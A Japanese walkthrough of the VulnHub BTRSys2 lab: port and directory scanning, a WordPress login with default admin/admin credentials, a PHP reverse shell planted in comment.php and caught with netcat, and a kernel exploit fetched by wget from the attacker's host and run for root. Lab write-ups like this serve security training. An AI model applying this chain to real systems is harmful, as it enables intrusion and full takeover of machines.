vulnhub BTRSys2 v2.1 雑記
BTRSys2
google driveからのダウンロードファイル解凍後のovfファイルが上手く動かなかった。
vulnhub.comのダウンロードファイルのovfは上手く動いてくれた。
ip取得が上手くいかなかったので、
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
サービス調査
# nmap -p- 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT Nmap scan report for 10.10.10.13 Host is up (0.00015s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT Nmap scan report for 10.10.10.13 Host is up (0.00051s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.3
# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
特に無し。
# ftp 10.10.10.13 Connected to 10.10.10.13. 220 (vsFTPd 3.0.3) Name (10.10.10.13:root): 331 Please specify the password. Password: l530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS.
ログイン必要なので終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
このバージョン以前にも見たけど、Username Enumerationにしかexploit無いし精度低かった気がする。
終。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.13 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.13 + Target Hostname: 10.10.10.13 + Target Port: 80 + Start Time: 2020-05-11 07:30:36 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3233: /icons/README: Apache default file found. + 7865 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-11 07:31:40 (GMT-4) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
robots.txtが気になる。
# dirb http://10.10.10.13
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)
==> DIRECTORY: http://10.10.10.13/javascript/
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.13/upload/
==> DIRECTORY: http://10.10.10.13/wordpress/
---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/
---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/
==> DIRECTORY: http://10.10.10.13/upload/admins/
==> DIRECTORY: http://10.10.10.13/upload/framework/
==> DIRECTORY: http://10.10.10.13/upload/include/
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/languages/
==> DIRECTORY: http://10.10.10.13/upload/media/
==> DIRECTORY: http://10.10.10.13/upload/modules/
==> DIRECTORY: http://10.10.10.13/upload/page/
==> DIRECTORY: http://10.10.10.13/upload/search/
==> DIRECTORY: http://10.10.10.13/upload/temp/
==> DIRECTORY: http://10.10.10.13/upload/templates/
---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/account/templates/
---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/
==> DIRECTORY: http://10.10.10.13/upload/admins/login/
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/
==> DIRECTORY: http://10.10.10.13/upload/admins/media/
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/
==> DIRECTORY: http://10.10.10.13/upload/admins/service/
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/
==> DIRECTORY: http://10.10.10.13/upload/admins/start/
==> DIRECTORY: http://10.10.10.13/upload/admins/support/
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/
==> DIRECTORY: http://10.10.10.13/upload/admins/users/
---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/
---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/
---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/page/posts/
---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/temp/search/
---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/
---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/
---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)
---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/
---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/
---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ----
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ----
+ http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)
---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ----
+ http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)
---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ----
+ http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ----
+ http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/
+ http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67)
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ----
+ http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67)
-----------------
END_TIME: Mon May 11 07:34:12 2020
DOWNLOADED: 267496 - FOUND: 71
珍しく、情報量のとても多いdirb結果。
気になるディレクトリは主に「/upload/」と「/wordpress/」の二つ。
とりあえず、「/robots.txt」を確認する。
# curl 10.10.10.13/robots.txt Disallow: Hackers Allow: /wordpress/ .o+. :o/ -o+` /hh: shh` +hh- /hh: shh` -/: +hh- /hh: shh` +s+ +hh- /hh/............ `....shh-.... ...............` `-` `..............` +hh- .. /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/ oys +ssssssssssssss/ +hh- .+yy- /hh+---------/hh+ .----yhh:---- :hho------------` yhy` oyy------------` +hh- .+yys:` /hh: -hh+ shh` :hh+ yhy` oyy +hh- `.+yys/` /hh: -hh+ shh` :hh+ yhy` oss `-- +hhsssssyhy/` /hh: -hh+ shh` :hh+ yhy` `-. +yy. +hho+++osyy+. /hh: -hh+ shh` :hh+ yhy` +yy. +hh- `/syy+. /hho:::::::::+hh+ shh` :hh+ yhy` .::::::::::::oyy. +hh- `/yyy/` :yyyyyyyyyyyyyyy: +ys` .yy: oys +sssssssssssssss` /ys. `/sy- ``````````````` ` `` ` `````````````` ``
特に新たに得られた情報は無し。
改めてブラウザでホームページに接続してみると何か蠢いているgif
「/upload/」にアクセスすると、
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
phpでmysqlの参照に失敗してる?
なんにしろこれ以上は「/upload/」にアクセスできない模様。
では、「/wordpress/」をチェック。
表示したページは本来のwordpressのデザインを読み込めていない?
Log in , admin
「Log in」があるので「admin/admin」でログイン試行。
あーログインできちゃったようなので、Appearance->Editorから簡単にアクセスできそうなphpを弄る。
お好みだけど、reverse-shellをsearch.phpにセットするのが分かりやすくて好き。
reverse-shellはいつもお世話になっているpentestmonkey産。
kaliならば、「/usr/share/webshells/php/php-reverse-shell.php」にある。
ここで、今回は「search.php」が動かなかったため(仕様?)、「comment.php」を改変してreverse-shellした。
window 1 # nc -nlvp 8080
firefoxから任意の記事にpostcommentする。
window 1 Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 14:43:02 up 1:24, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $
shell getchu!
after shell getchu
kernel exploit
怪しいファイル全く見つからず、cron探しても目ぼしいものは無く。
仕方がないのでkernel exploit狙いでいく。
victim $ uname -a Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker
# searchsploit ubuntu 4.4
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
(snip)
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
ささりそうな気がしたやつ。
「41458.c」を試す。
$ cd /tmp
$ ls
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ wget 10.10.10.3/41458.c
--2020-05-11 15:17:10-- http://10.10.10.3/41458.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/plain]
Saving to: '41458.c'
0K .......... ...... 100% 46.3M=0s
2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554]
$ ls
41458.c
systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU
$ gcc 41458.c
/bin/sh: 7: gcc: not found
えぇ、gcc無いんか。
コンパイル済みをダウンロードするか。
$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07-- http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'
0K .......... .......... ... 100% 68.2M=0s
2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]
$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
ちなみにこの後kernel panic起こした。
ttyでやっちゃったからかなぁ
「/usr/share/exploitdb/exploits/linux/local/44298.c」もroot取れた
こちらはkernel panic起こらず。
